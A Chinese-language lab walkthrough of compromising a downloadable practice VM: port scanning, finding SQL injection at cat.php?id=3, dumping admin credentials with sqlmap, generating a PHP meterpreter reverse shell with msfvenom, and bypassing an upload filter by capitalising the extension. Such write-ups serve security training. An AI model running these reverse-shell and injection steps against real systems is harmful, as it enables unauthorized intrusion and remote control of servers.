1. 程式人生 > 實用技巧 >CTF基本:SQL注入之get引數注入(附靶機下載連結永久有效)

CTF基本:SQL注入之get引數注入(附靶機下載連結永久有效)

靶機地址:
連結:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg
提取碼:8520

準備環境:

vm下kali系統和靶機

kali:192.168.111.128

靶機:192.168.111.130

首先進行資訊收集這裡我們用到埠掃描之王-nmap

namp -sV 192.168.111.130 探測埠服務版本

由此我們得到開放了22和80埠 對應的服務分別是ssh和apache

然後我們再進一步探測 使用Nikto -host http://192.168.111.130// 探測敏感資訊

分析資訊可以得到後臺目錄存在/admin/login 目錄下

嘗試弱口令登入後無果 繼續尋找資訊

使用owasp zap 找到存在sql注入

存在sql注入在http://192.168.111.130/cat.php?id=3

然後使用神器sqlmap跑一下 目的得到後臺管理員賬號和密碼

此處不得不感嘆sqlmap的強大 同樣的注入點比我們手工效率要快很多

得到賬號admin 密碼:P4ssw0rd

然後我們可以登入後臺發現可上傳檔案

是我們拿shell最簡單的方式

由此我們可以想到可以使用msf的生成一個php木馬檔案來反彈shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.111.128 lport=4444 -f raw >shell.php

由此我們在桌面上生成了一個shell.php的檔案

然後我們需要用到msfconsole

然後設定好我們需要設定的 LHOST(kali地址)和lport(監聽埠之後)

進行反彈shell

然後我們exploit或者run就可以開啟監聽

然後把我們製作好的shell.php上傳 發現不允許上傳.php字尾檔案

這裡我們用最簡單的大寫繞過 改為shell.PHP

然後我們可以點選shell 如果沒出錯的話 kali裡邊是有反彈的

可以看到攻擊成功 順利拿到shell

整個測試很簡單 但是 需要我們思路明確能清楚每一步的步驟和目的

此教程僅用於實驗測試。